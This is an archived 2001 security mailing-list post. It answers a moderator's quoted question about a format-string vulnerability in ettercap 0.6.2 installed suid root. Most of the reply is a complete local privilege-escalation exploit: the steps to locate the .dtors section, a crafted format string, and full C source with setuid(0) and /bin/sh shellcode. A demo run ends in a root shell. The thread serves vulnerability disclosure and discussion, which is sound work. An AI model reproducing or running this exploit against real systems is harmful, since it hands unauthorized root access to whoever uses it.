Firstly, let's retrieve the address of the section .dtors:
cb@tshaw$ objdump -s -j .dtors /usr/local/sbin/ettercap
/usr/local/sbin/ettercap: file format elf32-i386
Contents of section .dtors:
8119a70 ffffffff 00000000 ........
cb@tshaw$
So the fmt string is composed of:
- "000" for allignment.
- "\x74\x9a\x11\x08\x76\x9a\x11\x08" provides the addresses where we
expect to write (here .dtors + 4 -- 0x8119a74.)
- "%.49119x%16$hn%.16145x%15$hn" ret addr in shellcode.
This format string was built using fmtbuilder:
http://minimum.inria.fr/~raynal/index.php3?page=501
---- ettercap-exp.c ----
#include <stdio.h>
#include <stdlib.h>
int main()
{
char buf[1024];
char shellcode[] =
/* setuid(0) */
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
/* Aleph 1 shellcode */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char *fmt = "000\x74\x9a\x11\x08\x76\x9a\x11\x08%.49119x%16$hn%.16145x%15$hn";
memset(buf, 0x90, 1024);
memcpy(buf + 1024 - strlen(shellcode), shellcode, strlen(shellcode));
setenv("SHELLCODE", buf, 1);
execl("/usr/local/sbin/ettercap", "ettercap", fmt, 0x0);
}
---- ettercap-exp.c ----
Demo:
This demo is made with a suid root version.
cb@tshaw$ gcc -o ettercap-exp ettercap-exp.c
cb@tshaw$ ./ettercap-exp
ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
may the packets be with you...
Invalid host address
000tv00000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000
....snip....
0000000000000000000000000000000000000000000000081020c0 !!
sh-2.04# id
uid=0(root) groups=100(users)
Best regards,
--
Christophe Bailleux - Network & System Security Engineer
Club-Internet / T-Online France
Voice:+33-(0)1-5545-4789 - mailto:cb@t-online.fr
On Tue, 4 Dec 2001, Blue Boar wrote:
> Goobles sent another post to vuln-dev today, which was rejected due
> to personal attacks in their note. I want to check out their claim,
> however. If you want to see their original posting, it's on their
> web site like the others, I'm sure. It includes a claimed exploit,
> which cannot be posted due to their wishes that it not be separated
> from the advisory. If someone wants to write an independent exploit,
> I'd be happy to post that, provided it follows the list rules,
> of course.
>
> Here's the basic problem:
>
> ettercap %x%x%x%x%x%x%x
> ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
>
> may the packets be with you...
>
>
> Invalid host address 807a0ef807a0e900bffffb71bffff850805ad52 !!
>
> Gobbles' point is that there is an option to configure it suid,
> so this could be exploitable when that is used. Why someone
> would want a packet capture program to be used by non-priv users..
> Well, I'm sure there's a good reason somewhere in the world.
>
> Is anyone using it that way? Are there OS distributions that come
> with Ettercap installed by default? And, of course, is it suid?
> (I can't imagine it would be.) The workaround is obvious, don't
> run it suid or allow remote users who do not already have a shell
> to execute it with a command-line parameter (such as via a web
> interface.)
>
> BB
>
This archive was generated by hypermail 2b30 : Wed Dec 05 2001 - 10:09:19 PST